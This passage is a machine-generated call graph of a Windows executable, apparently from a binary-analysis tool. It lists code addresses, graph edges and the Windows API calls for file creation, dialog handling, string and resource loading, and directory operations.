7ff7b8f05d57 25736->25737 25758 7ff7b8f05d50 25736->25758 25740 7ff7b8ef12c0 33 API calls 25737->25740 25738 7ff7b8f21d70 _handle_error 8 API calls 25739 7ff7b8f026e6 25738->25739 25739->25685 25739->25686 25741 7ff7b8f05d89 25740->25741 25742 7ff7b8f05fda 25741->25742 25743 7ff7b8f05da9 25741->25743 25744 7ff7b8f055f8 35 API calls 25742->25744 25745 7ff7b8f05dc3 25743->25745 25774 7ff7b8f05e60 25743->25774 25747 7ff7b8f05ffc 25744->25747 25746 7ff7b8f063bb 25745->25746 25809 7ff7b8ef2af0 25745->25809 25854 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 25746->25854 25748 7ff7b8f061fd 25747->25748 25750 7ff7b8f06030 25747->25750 25756 7ff7b8f05e5b 25747->25756 25753 7ff7b8f063df 25748->25753 25760 7ff7b8ef2af0 4 API calls 25748->25760 25754 7ff7b8f063cd 25750->25754 25763 7ff7b8ef2af0 4 API calls 25750->25763 25751 7ff7b8f063c1 25764 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25751->25764 25857 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 25753->25857 25855 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 25754->25855 25755 7ff7b8f063e5 25765 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25755->25765 25756->25751 25756->25755 25756->25758 25766 7ff7b8f063b6 25756->25766 25758->25738 25759 7ff7b8f05e1e 25767 7ff7b8ef1fa8 31 API calls 25759->25767 25775 7ff7b8f05e2f BuildCatchObjectHelperInternal 25759->25775 25761 7ff7b8f06267 25760->25761 25852 7ff7b8ef11ec 33 API calls BuildCatchObjectHelperInternal 25761->25852 25787 7ff7b8f0608d BuildCatchObjectHelperInternal 25763->25787 25772 7ff7b8f063c7 25764->25772 25773 7ff7b8f063eb 25765->25773 25771 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25766->25771 25767->25775 25769 7ff7b8f063d3 25782 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25769->25782 25770 7ff7b8ef1fa8 31 API calls 25770->25756 25771->25746 25783 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25772->25783 25779 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25773->25779 25774->25756 25776 7ff7b8ef12c0 33 API calls 25774->25776 25775->25770 25780 7ff7b8f05eda 25776->25780 25777 7ff7b8f0627a 25853 7ff7b8f04b34 33 API calls BuildCatchObjectHelperInternal 25777->25853 25778 7ff7b8ef1fa8 31 API calls 25793 7ff7b8f06107 25778->25793 25784 7ff7b8f063f1 25779->25784 25817 7ff7b8f04ba8 25780->25817 25786 7ff7b8f063d9 25782->25786 25783->25754 25856 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 25786->25856 25787->25769 25787->25778 25791 7ff7b8ef1fa8 31 API calls 25792 7ff7b8f062fc 25791->25792 25795 7ff7b8ef1fa8 31 API calls 25792->25795 25796 7ff7b8f06132 25793->25796 25835 7ff7b8ef1754 25793->25835 25794 7ff7b8f0628a BuildCatchObjectHelperInternal 25794->25773 25794->25791 25798 7ff7b8f06306 25795->25798 25796->25786 25802 7ff7b8ef12c0 33 API calls 25796->25802 25797 7ff7b8ef1fa8 31 API calls 25800 7ff7b8f05f80 25797->25800 25801 7ff7b8ef1fa8 31 API calls 25798->25801 25804 7ff7b8ef1fa8 31 API calls 25800->25804 25801->25756 25805 7ff7b8f061d0 25802->25805 25803 7ff7b8f05f06 BuildCatchObjectHelperInternal 25803->25772 25803->25797 25804->25756 25848 7ff7b8ef2044 25805->25848 25807 7ff7b8f061ed 25808 7ff7b8ef1fa8 31 API calls 25807->25808 25808->25756 25810 7ff7b8ef2b40 25809->25810 25815 7ff7b8ef2b6c BuildCatchObjectHelperInternal 25809->25815 25811 7ff7b8ef2bfb 25810->25811 25812 7ff7b8ef2b55 25810->25812 25858 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25811->25858 25812->25815 25816 7ff7b8f21c20 4 API calls 25812->25816 25815->25759 25816->25815 25818 7ff7b8f04bd1 25817->25818 25819 7ff7b8f04c26 25818->25819 25820 7ff7b8f04be3 25818->25820 25859 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 25819->25859 25822 7ff7b8ef2af0 4 API calls 25820->25822 25824 7ff7b8f04c0e 25822->25824 25825 7ff7b8efd5bc 25824->25825 25828 7ff7b8efd60d 25825->25828 25826 7ff7b8efd79d 25861 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 25826->25861 25828->25826 25829 7ff7b8efd6e1 25828->25829 25831 7ff7b8efd798 25828->25831 25834 7ff7b8efd613 BuildCatchObjectHelperInternal 25828->25834 25833 7ff7b8f21c20 4 API calls 25829->25833 25829->25834 25860 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25831->25860 25833->25834 25834->25803 25836 7ff7b8ef18ac 25835->25836 25839 7ff7b8ef1794 25835->25839 25862 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 25836->25862 25838 7ff7b8ef18b2 25863 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25838->25863 25839->25838 25841 7ff7b8f21c20 4 API calls 25839->25841 25846 7ff7b8ef17d3 BuildCatchObjectHelperInternal 25839->25846 25841->25846 25845 7ff7b8ef1864 BuildCatchObjectHelperInternal 25845->25796 25846->25845 25847 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25846->25847 25847->25836 25849 7ff7b8ef2097 25848->25849 25851 7ff7b8ef2069 BuildCatchObjectHelperInternal 25848->25851 25864 7ff7b8ef15cc 33 API calls 3 library calls 25849->25864 25851->25807 25852->25777 25853->25794 25856->25753 25864->25851 25865->25697 25877 7ff7b8f089a8 25867->25877 25870 7ff7b8f0a2b2 25870->25719 25871 7ff7b8f0a284 LoadStringW 25871->25870 25872 7ff7b8f0a29d LoadStringW 25871->25872 25872->25870 25873->25718 25875->25718 25884 7ff7b8f08870 25877->25884 25881 7ff7b8f21d70 _handle_error 8 API calls 25883 7ff7b8f08a26 25881->25883 25882 7ff7b8f08a0d 25882->25881 25883->25870 25883->25871 25885 7ff7b8f088c7 25884->25885 25893 7ff7b8f08965 25884->25893 25889 7ff7b8f088f5 25885->25889 25898 7ff7b8f1055c WideCharToMultiByte 25885->25898 25887 7ff7b8f21d70 _handle_error 8 API calls 25888 7ff7b8f08999 25887->25888 25888->25882 25894 7ff7b8f08a34 25888->25894 25892 7ff7b8f08924 25889->25892 25900 7ff7b8f09d14 45 API calls 2 library calls 25889->25900 25901 7ff7b8f26b48 31 API calls 2 library calls 25892->25901 25893->25887 25895 7ff7b8f08a74 25894->25895 25897 7ff7b8f08a9d 25894->25897 25902 7ff7b8f26b48 31 API calls 2 library calls 25895->25902 25897->25882 25899 7ff7b8f1059d 25898->25899 25899->25889 25900->25892 25901->25893 25902->25897 25919 7ff7b8f0ccf8 25903->25919 25908 7ff7b8f0d10f swprintf 25915 7ff7b8f0d19e 25908->25915 25933 7ff7b8f29474 25908->25933 25960 7ff7b8ef98c0 33 API calls 25908->25960 25909 7ff7b8f0d1c7 25911 7ff7b8f0d23e 25909->25911 25913 7ff7b8f0d266 25909->25913 25912 7ff7b8f21d70 _handle_error 8 API calls 25911->25912 25914 7ff7b8f0d252 25912->25914 25916 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25913->25916 25914->25491 25915->25909 25961 7ff7b8ef98c0 33 API calls 25915->25961 25917 7ff7b8f0d26b 25916->25917 25920 7ff7b8f0ce89 25919->25920 25921 7ff7b8f0cd2a 25919->25921 25923 7ff7b8f0c784 25920->25923 25921->25920 25922 7ff7b8ef1754 33 API calls 25921->25922 25922->25921 25925 7ff7b8f0c7ba 25923->25925 25931 7ff7b8f0c87f 25923->25931 25926 7ff7b8f0c7f2 25925->25926 25928 7ff7b8f0c87a 25925->25928 25932 7ff7b8f0c7c2 25925->25932 25930 7ff7b8f21c20 4 API calls 25926->25930 25926->25932 25962 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25928->25962 25930->25932 25963 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 25931->25963 25932->25908 25934 7ff7b8f294ba 25933->25934 25935 7ff7b8f294d2 25933->25935 25964 7ff7b8f2c5bc 15 API calls memcpy_s 25934->25964 25935->25934 25937 7ff7b8f294dc 25935->25937 25966 7ff7b8f27474 35 API calls 2 library calls 25937->25966 25938 7ff7b8f294bf 25965 7ff7b8f26814 31 API calls _invalid_parameter_noinfo_noreturn 25938->25965 25941 7ff7b8f21d70 _handle_error 8 API calls 25943 7ff7b8f2968f 25941->25943 25942 7ff7b8f294ed memcpy_s 25967 7ff7b8f273f4 15 API calls memcpy_s 25942->25967 25943->25908 25945 7ff7b8f29558 25968 7ff7b8f2787c 46 API calls 3 library calls 25945->25968 25947 7ff7b8f29561 25948 7ff7b8f29569 25947->25948 25949 7ff7b8f29598 25947->25949 25969 7ff7b8f2c7b8 25948->25969 25951 7ff7b8f295f0 25949->25951 25952 7ff7b8f295a7 25949->25952 25953 7ff7b8f29616 25949->25953 25954 7ff7b8f2959e 25949->25954 25955 7ff7b8f2c7b8 __free_lconv_num 15 API calls 25951->25955 25957 7ff7b8f2c7b8 __free_lconv_num 15 API calls 25952->25957 25953->25951 25956 7ff7b8f29620 25953->25956 25954->25951 25954->25952 25959 7ff7b8f294ca 25955->25959 25958 7ff7b8f2c7b8 __free_lconv_num 15 API calls 25956->25958 25957->25959 25958->25959 25959->25941 25960->25908 25961->25909 25964->25938 25965->25959 25966->25942 25967->25945 25968->25947 25970 7ff7b8f2c7bd RtlFreeHeap 25969->25970 25974 7ff7b8f2c7ed __free_lconv_num 25969->25974 25971 7ff7b8f2c7d8 25970->25971 25970->25974 25975 7ff7b8f2c5bc 15 API calls memcpy_s 25971->25975 25973 7ff7b8f2c7dd GetLastError 25973->25974 25974->25959 25975->25973 25977 7ff7b8ef20e2 25976->25977 25978 7ff7b8ef20e8 BuildCatchObjectHelperInternal 25977->25978 25980 7ff7b8ef1490 33 API calls 3 library calls 25977->25980 25978->25501 25980->25978 25983->25545 25984->25535 25985->25543 25986->25548 25988 7ff7b8ef2191 25987->25988 25989 7ff7b8ef218b memcpy_s 25987->25989 25988->25989 25991 7ff7b8ef21d8 33 API calls 4 library calls 25988->25991 25989->25564 25991->25989 25993 7ff7b8f17ed3 SizeofResource 25992->25993 25994 7ff7b8f1801f 25992->25994 25993->25994 25995 7ff7b8f17eed LoadResource 25993->25995 25994->25588 25995->25994 25996 7ff7b8f17f06 LockResource 25995->25996 25996->25994 25997 7ff7b8f17f1b GlobalAlloc 25996->25997 25997->25994 25998 7ff7b8f17f3c GlobalLock 25997->25998 25999 7ff7b8f17f4e BuildCatchObjectHelperInternal 25998->25999 26000 7ff7b8f18016 GlobalFree 25998->26000 26001 7ff7b8f17f5c CreateStreamOnHGlobal 25999->26001 26000->25994 26002 7ff7b8f17f7a GdipAlloc 26001->26002 26003 7ff7b8f1800d GlobalUnlock 26001->26003 26004 7ff7b8f17f8f 26002->26004 26003->26000 26004->26003 26005 7ff7b8f17ff6 26004->26005 26006 7ff7b8f17fde GdipCreateHBITMAPFromBitmap 26004->26006 26005->26003 26006->26005 26008 7ff7b8f17d50 4 API calls 26007->26008 26009 7ff7b8f17d2e 26008->26009 26010 7ff7b8f17d3d 26009->26010 26018 7ff7b8f17d88 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26009->26018 26010->25592 26010->25593 26010->25595 26012->25596 26014 7ff7b8f17d67 26013->26014 26015 7ff7b8f17d62 26013->26015 26017 7ff7b8f18690 16 API calls _handle_error 26014->26017 26019 7ff7b8f17e14 GetDC 26015->26019 26017->25602 26018->26010 26020 7ff7b8f17e2a GetDeviceCaps GetDeviceCaps ReleaseDC 26019->26020 26021 7ff7b8f17e5d 26019->26021 26020->26021 26021->26014 26023 7ff7b8f08b32 _snwprintf 26022->26023 26024 7ff7b8f08bb7 26023->26024 26025 7ff7b8f08c53 26023->26025 26140 7ff7b8f05bbc 48 API calls 26024->26140 26141 7ff7b8ef3cac 26025->26141 26028 7ff7b8f08c3d 26091 7ff7b8f01890 26028->26091 26029 7ff7b8ef1fa8 31 API calls 26029->26028 26030 7ff7b8f08bc1 BuildCatchObjectHelperInternal 26030->26029 26032 7ff7b8f09635 26030->26032 26035 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26032->26035 26034 7ff7b8f08c7d 26036 7ff7b8f01444 97 API calls 26034->26036 26038 7ff7b8f0963b 26035->26038 26039 7ff7b8f08c86 26036->26039 26037 7ff7b8f08d34 26109 7ff7b8f26d20 26037->26109 26044 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26038->26044 26039->26038 26041 7ff7b8f08cc1 26039->26041 26047 7ff7b8f21d70 _handle_error 8 API calls 26041->26047 26043 7ff7b8f08ccb 26043->26037 26048 7ff7b8f0809c 33 API calls 26043->26048 26045 7ff7b8f09641 26044->26045 26046 7ff7b8f26d20 31 API calls 26060 7ff7b8f08d6f __vcrt_FlsAlloc 26046->26060 26049 7ff7b8f09615 26047->26049 26048->26043 26049->25605 26050 7ff7b8f08ea3 26051 7ff7b8f01e50 98 API calls 26050->26051 26063 7ff7b8f08f76 26050->26063 26054 7ff7b8f08ebb 26051->26054 26057 7ff7b8f01c80 101 API calls 26054->26057 26054->26063 26061 7ff7b8f08ee3 26057->26061 26060->26050 26060->26063 26117 7ff7b8f01f60 26060->26117 26126 7ff7b8f01c80 26060->26126 26131 7ff7b8f01e50 26060->26131 26061->26063 26083 7ff7b8f08ef1 __vcrt_FlsAlloc 26061->26083 26145 7ff7b8f101a8 MultiByteToWideChar 26061->26145 26136 7ff7b8f01444 26063->26136 26064 7ff7b8f09401 26078 7ff7b8f094d6 26064->26078 26151 7ff7b8f2beb0 31 API calls 2 library calls 26064->26151 26066 7ff7b8f0936d 26066->26064 26148 7ff7b8f2beb0 31 API calls 2 library calls 26066->26148 26067 7ff7b8f09361 26067->25605 26070 7ff7b8f095aa 26073 7ff7b8f26d20 31 API calls 26070->26073 26071 7ff7b8f0945e 26152 7ff7b8f2a6dc 31 API calls _invalid_parameter_noinfo_noreturn 26071->26152 26072 7ff7b8f094c3 26072->26078 26153 7ff7b8f07f20 33 API calls 2 library calls 26072->26153 26076 7ff7b8f095d4 26073->26076 26074 7ff7b8f0809c 33 API calls 26074->26078 26080 7ff7b8f26d20 31 API calls 26076->26080 26078->26070 26078->26074 26079 7ff7b8f09383 26149 7ff7b8f2a6dc 31 API calls _invalid_parameter_noinfo_noreturn 26079->26149 26080->26063 26081 7ff7b8f093ee 26081->26064 26150 7ff7b8f07f20 33 API calls 2 library calls 26081->26150 26083->26063 26083->26064 26083->26066 26083->26067 26084 7ff7b8f09630 26083->26084 26086 7ff7b8f1055c WideCharToMultiByte 26083->26086 26146 7ff7b8f09d14 45 API calls 2 library calls 26083->26146 26147 7ff7b8f26b48 31 API calls 2 library calls 26083->26147 26154 7ff7b8f22074 8 API calls 26084->26154 26086->26083 26090 7ff7b8f09670 26089->26090 26090->25607 26092 7ff7b8f018cd CreateFileW 26091->26092 26094 7ff7b8f01981 GetLastError 26092->26094 26097 7ff7b8f01a43 26092->26097 26095 7ff7b8f05d18 49 API calls 26094->26095 26096 7ff7b8f019b1 26095->26096 26099 7ff7b8f019b5 CreateFileW GetLastError 26096->26099 26100 7ff7b8f01a01 26096->26100 26098 7ff7b8f01aa3 26097->26098 26101 7ff7b8f01a85 SetFileTime 26097->26101 26102 7ff7b8f01ac9 26098->26102 26103 7ff7b8ef3cac 33 API calls 26098->26103 26099->26100 26100->26097 26106 7ff7b8f01af7 26100->26106 26101->26098 26104 7ff7b8f21d70 _handle_error 8 API calls 26102->26104 26103->26102 26105 7ff7b8f01adc 26104->26105 26105->26034 26105->26043 26107 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26106->26107 26108 7ff7b8f01afc 26107->26108 26110 7ff7b8f26d4d 26109->26110 26116 7ff7b8f26d62 26110->26116 26155 7ff7b8f2c5bc 15 API calls memcpy_s 26110->26155 26112 7ff7b8f26d57 26156 7ff7b8f26814 31 API calls _invalid_parameter_noinfo_noreturn 26112->26156 26113 7ff7b8f21d70 _handle_error 8 API calls 26115 7ff7b8f08d51 26113->26115 26115->26046 26116->26113 26118 7ff7b8f01f7d 26117->26118 26123 7ff7b8f01f99 26117->26123 26119 7ff7b8f01fab 26118->26119 26157 7ff7b8efb118 96 API calls Concurrency::cancel_current_task 26118->26157 26119->26060 26121 7ff7b8f01fb1 SetFilePointer 26121->26119 26122 7ff7b8f01fce GetLastError 26121->26122 26122->26119 26124 7ff7b8f01fd8 26122->26124 26123->26119 26123->26121 26124->26119 26158 7ff7b8efb118 96 API calls Concurrency::cancel_current_task 26124->26158 26127 7ff7b8f01ca6 26126->26127 26128 7ff7b8f01cad 26126->26128 26127->26060 26128->26127 26130 7ff7b8f01710 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26128->26130 26159 7ff7b8efaff4 96 API calls Concurrency::cancel_current_task 26128->26159 26130->26128 26160 7ff7b8f01b3c 26131->26160 26133 7ff7b8f01e77 26133->26060 26137 7ff7b8f0145e 26136->26137 26138 7ff7b8f0146a 26136->26138 26137->26138 26168 7ff7b8f014d0 26137->26168 26140->26030 26142 7ff7b8ef3cc3 26141->26142 26143 7ff7b8ef3cda BuildCatchObjectHelperInternal 26141->26143 26142->26143 26175 7ff7b8ef1490 33 API calls 3 library calls 26142->26175 26143->26028 26145->26083 26146->26083 26147->26083 26148->26079 26149->26081 26150->26064 26151->26071 26152->26072 26153->26078 26154->26032 26155->26112 26156->26116 26166 7ff7b8f01b4a _snwprintf 26160->26166 26161 7ff7b8f01b76 26163 7ff7b8f21d70 _handle_error 8 API calls 26161->26163 26162 7ff7b8f01c45 SetFilePointer 26162->26161 26164 7ff7b8f01c6d GetLastError 26162->26164 26165 7ff7b8f01bd9 26163->26165 26164->26161 26165->26133 26167 7ff7b8efb118 96 API calls Concurrency::cancel_current_task 26165->26167 26166->26161 26166->26162 26169 7ff7b8f014ea 26168->26169 26170 7ff7b8f01502 26168->26170 26169->26170 26172 7ff7b8f014f6 CloseHandle 26169->26172 26171 7ff7b8f01526 26170->26171 26174 7ff7b8efaca4 96 API calls 26170->26174 26171->26138 26172->26170 26174->26171 26175->26143 26177 7ff7b8f07276 SetCurrentDirectoryW 26176->26177 26178 7ff7b8f07273 26176->26178 26177->25620 26178->26177 26182 7ff7b8ef8ac4 26179->26182 26186 7ff7b8ef8b6f 26179->26186 26184 7ff7b8ef8aca 26182->26184 26185 7ff7b8f21c20 4 API calls 26182->26185 26188 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26184->26188 26185->26184 26189 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 26186->26189 26187->25628 26190->25643 26192 7ff7b8f2ae4c 26199 7ff7b8f2ab54 26192->26199 26204 7ff7b8f2c360 35 API calls 3 library calls 26199->26204 26203 7ff7b8f2ab5f 26205 7ff7b8f2bf88 35 API calls abort 26203->26205 26204->26203 26206 7ff7b8f21830 26207 7ff7b8f217b7 26206->26207 26207->26206 26208 7ff7b8f21330 _com_raise_error 14 API calls 26207->26208 26208->26207 26209 7ff7b8f1a9a0 26568 7ff7b8ef26c8 26209->26568 26211 7ff7b8f1a9fd 26212 7ff7b8f1aa17 26211->26212 26213 7ff7b8f1b8dd 26211->26213 26262 7ff7b8f1aa01 26211->26262 26216 7ff7b8f1aa27 26212->26216 26217 7ff7b8f1ab1c 26212->26217 26212->26262 26772 7ff7b8f1ebd8 26213->26772 26215 7ff7b8f21d70 _handle_error 8 API calls 26219 7ff7b8f1bdc7 26215->26219 26220 7ff7b8f1aaea 26216->26220 26221 7ff7b8f1aa2f 26216->26221 26224 7ff7b8f1abd3 26217->26224 26229 7ff7b8f1ab36 26217->26229 26226 7ff7b8f1ab0c EndDialog 26220->26226 26220->26262 26231 7ff7b8f0a008 58 API calls 26221->26231 26221->26262 26222 7ff7b8f1b904 SendMessageW 26223 7ff7b8f1b913 26222->26223 26227 7ff7b8f1b93a GetDlgItem SendMessageW 26223->26227 26228 7ff7b8f1b91f SendDlgItemMessageW 26223->26228 26576 7ff7b8ef241c GetDlgItem 26224->26576 26226->26262 26232 7ff7b8f055f8 35 API calls 26227->26232 26228->26227 26233 7ff7b8f0a008 58 API calls 26229->26233 26235 7ff7b8f1aa6a 26231->26235 26236 7ff7b8f1b994 GetDlgItem 26232->26236 26237 7ff7b8f1ab54 SetDlgItemTextW 26233->26237 26234 7ff7b8f1abf3 26244 7ff7b8f1ac0b EndDialog 26234->26244 26795 7ff7b8ef1ecc 34 API calls _handle_error 26235->26795 26791 7ff7b8ef268c 26236->26791 26240 7ff7b8f1ab69 26237->26240 26252 7ff7b8f1ab76 GetMessageW 26240->26252 26240->26262 26241 7ff7b8f1ac49 GetDlgItem 26242 7ff7b8f1ac90 SetFocus 26241->26242 26243 7ff7b8f1ac63 SendMessageW SendMessageW 26241->26243 26248 7ff7b8f1ad49 26242->26248 26249 7ff7b8f1aca6 26242->26249 26243->26242 26379 7ff7b8f1ac15 26244->26379 26245 7ff7b8f1aa7d 26251 7ff7b8f1aa96 26245->26251 26796 7ff7b8ef2678 26245->26796 26255 7ff7b8ef8a94 33 API calls 26248->26255 26256 7ff7b8f0a008 58 API calls 26249->26256 26250 7ff7b8f1b55c 26250->26234 26257 7ff7b8f1b564 26250->26257 26251->26262 26267 7ff7b8f1bdda 26251->26267 26253 7ff7b8f1ab94 IsDialogMessageW 26252->26253 26252->26262 26253->26240 26260 7ff7b8f1aba9 TranslateMessage DispatchMessageW 26253->26260 26263 7ff7b8f1ad8f 26255->26263 26264 7ff7b8f1acb0 26256->26264 26265 7ff7b8f0a008 58 API calls 26257->26265 26258 7ff7b8ef1fa8 31 API calls 26258->26262 26260->26240 26262->26215 26799 7ff7b8f1e7b8 33 API calls 2 library calls 26263->26799 26278 7ff7b8ef12c0 33 API calls 26264->26278 26270 7ff7b8f1b575 SetDlgItemTextW 26265->26270 26275 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26267->26275 26269 7ff7b8f1b77c 26269->26234 26272 7ff7b8f1b7af 26269->26272 26273 7ff7b8f1b7c6 26269->26273 26274 7ff7b8f0a008 58 API calls 26270->26274 26271 7ff7b8f1ad9d 26277 7ff7b8f0a008 58 API calls 26271->26277 26821 7ff7b8ef255c GetWindowTextLengthW 26272->26821 26276 7ff7b8ef8a94 33 API calls 26273->26276 26286 7ff7b8f1b5a7 26274->26286 26280 7ff7b8f1bddf 26275->26280 26299 7ff7b8f1b7bf BuildCatchObjectHelperInternal 26276->26299 26282 7ff7b8f1adc1 26277->26282 26285 7ff7b8f1ace5 26278->26285 26287 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26280->26287 26288 7ff7b8f0d2bc 48 API calls 26282->26288 26590 7ff7b8f1e8dc 26285->26590 26292 7ff7b8ef12c0 33 API calls 26286->26292 26293 7ff7b8f1bde5 26287->26293 26295 7ff7b8f1add4 26288->26295 26323 7ff7b8f1b5dc 26292->26323 26305 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26293->26305 26302 7ff7b8f1e8dc 24 API calls 26295->26302 26306 7ff7b8f1b85f 26299->26306 26315 7ff7b8ef1fa8 31 API calls 26299->26315 26308 7ff7b8f1ade4 26302->26308 26304 7ff7b8f1b68b 26313 7ff7b8f0a008 58 API calls 26304->26313 26314 7ff7b8f1bdeb 26305->26314 26327 7ff7b8ef1fa8 31 API calls 26306->26327 26338 7ff7b8f1b872 26306->26338 26317 7ff7b8ef1fa8 31 API calls 26308->26317 26311 7ff7b8f1ae5d 26322 7ff7b8f1ae8b 26311->26322 26801 7ff7b8f0266c 26311->26801 26312 7ff7b8f1ad3f 26312->26311 26800 7ff7b8f1f29c 33 API calls 2 library calls 26312->26800 26325 7ff7b8f1b695 26313->26325 26335 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26314->26335 26315->26306 26329 7ff7b8f1adf2 26317->26329 26604 7ff7b8f02314 26322->26604 26323->26304 26341 7ff7b8ef12c0 33 API calls 26323->26341 26350 7ff7b8ef12c0 33 API calls 26325->26350 26327->26338 26329->26293 26329->26312 26344 7ff7b8f1bdf1 26335->26344 26338->26234 26351 7ff7b8f1be03 26338->26351 26346 7ff7b8f1b62d 26341->26346 26355 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26344->26355 26353 7ff7b8f0a008 58 API calls 26346->26353 26347 7ff7b8f1aebd 26361 7ff7b8f07268 SetCurrentDirectoryW 26347->26361 26348 7ff7b8f1aea5 GetLastError 26348->26347 26372 7ff7b8f1b6ca 26350->26372 26357 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26351->26357 26352 7ff7b8f1ae7f 26804 7ff7b8f1960c 12 API calls _handle_error 26352->26804 26359 7ff7b8f1b638 26353->26359 26362 7ff7b8f1bdf7 26355->26362 26363 7ff7b8f1be09 26357->26363 26364 7ff7b8ef1170 33 API calls 26359->26364 26366 7ff7b8f1aecf 26361->26366 26374 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26362->26374 26375 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26363->26375 26368 7ff7b8f1b650 26364->26368 26370 7ff7b8f1aed6 GetLastError 26366->26370 26371 7ff7b8f1aee5 26366->26371 26383 7ff7b8ef2044 33 API calls 26368->26383 26370->26371 26377 7ff7b8f1af9c 26371->26377 26382 7ff7b8f1afab 26371->26382 26385 7ff7b8f1aefc GetTickCount 26371->26385 26372->26362 26373 7ff7b8f1b729 26372->26373 26378 7ff7b8f1bdfd 26373->26378 26373->26379 26374->26378 26381 7ff7b8f1be0f 26375->26381 26377->26382 26395 7ff7b8f1b415 26377->26395 26386 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26378->26386 26379->26258 26387 7ff7b8ef26c8 63 API calls 26381->26387 26388 7ff7b8f1b2d1 26382->26388 26392 7ff7b8f05758 34 API calls 26382->26392 26389 7ff7b8f1b66f 26383->26389 26616 7ff7b8ef4cdc 26385->26616 26386->26351 26391 7ff7b8f1be80 26387->26391 26388->26234 26814 7ff7b8ef2830 33 API calls 26388->26814 26393 7ff7b8ef1fa8 31 API calls 26389->26393 26398 7ff7b8f1be84 26391->26398 26403 7ff7b8f1bf26 GetDlgItem SetFocus 26391->26403 26426 7ff7b8f1be9a 26391->26426 26399 7ff7b8f1afcf 26392->26399 26400 7ff7b8f1b67d 26393->26400 26394 7ff7b8f1af11 26411 7ff7b8ef1fa8 31 API calls 26394->26411 26406 7ff7b8f0a008 58 API calls 26395->26406 26410 7ff7b8f21d70 _handle_error 8 API calls 26398->26410 26805 7ff7b8f0b25c 99 API calls 26399->26805 26405 7ff7b8ef1fa8 31 API calls 26400->26405 26401 7ff7b8f1b2f6 26815 7ff7b8ef1170 26401->26815 26412 7ff7b8f1bf5a 26403->26412 26405->26304 26413 7ff7b8f1b443 SetDlgItemTextW 26406->26413 26409 7ff7b8f1afe9 GetCurrentProcessId 26415 7ff7b8f0d2bc 48 API calls 26409->26415 26416 7ff7b8f1c533 26410->26416 26417 7ff7b8f1af44 26411->26417 26418 7ff7b8ef12c0 33 API calls 26412->26418 26419 7ff7b8ef26a0 26413->26419 26414 7ff7b8f1b30e 26420 7ff7b8f0a008 58 API calls 26414->26420 26421 7ff7b8f1b03e GetCommandLineW 26415->26421 26622 7ff7b8f01534 26417->26622 26423 7ff7b8f1bf6c 26418->26423 26424 7ff7b8f1b461 SetDlgItemTextW GetDlgItem 26419->26424 26425 7ff7b8f1b31b 26420->26425 26427 7ff7b8f1b0d4 26421->26427 26428 7ff7b8f1b0e3 26421->26428 26422 7ff7b8f1bed1 SendDlgItemMessageW 26429 7ff7b8f1befa EndDialog 26422->26429 26430 7ff7b8f1bef1 26422->26430 26833 7ff7b8f0737c 33 API calls 26423->26833 26433 7ff7b8f1b48c GetWindowLongPtrW SetWindowLongPtrW 26424->26433 26434 7ff7b8f1b4b2 26424->26434 26435 7ff7b8ef1170 33 API calls 26425->26435 26426->26398 26426->26422 26436 7ff7b8ef20c0 33 API calls 26427->26436 26806 7ff7b8f1a410 33 API calls _handle_error 26428->26806 26429->26398 26430->26429 26433->26434 26638 7ff7b8f1c9a4 26434->26638 26440 7ff7b8f1b32e 26435->26440 26436->26428 26439 7ff7b8f1bf80 26445 7ff7b8ef2678 SetDlgItemTextW 26439->26445 26446 7ff7b8ef1fa8 31 API calls 26440->26446 26442 7ff7b8f1b0f4 26807 7ff7b8f1a410 33 API calls _handle_error 26442->26807 26443 7ff7b8f1af72 GetLastError 26444 7ff7b8f1af81 26443->26444 26449 7ff7b8f01444 97 API calls 26444->26449 26450 7ff7b8f1bf94 26445->26450 26451 7ff7b8f1b33c 26446->26451 26454 7ff7b8f1af8e 26449->26454 26459 7ff7b8f1bfcb SendDlgItemMessageW FindFirstFileW 26450->26459 26455 7ff7b8ef1fa8 31 API calls 26451->26455 26452 7ff7b8f1c9a4 163 API calls 26456 7ff7b8f1b4db 26452->26456 26453 7ff7b8f1b105 26808 7ff7b8f1a410 33 API calls _handle_error 26453->26808 26458 7ff7b8ef1fa8 31 API calls 26454->26458 26460 7ff7b8f1b34a 26455->26460 26757 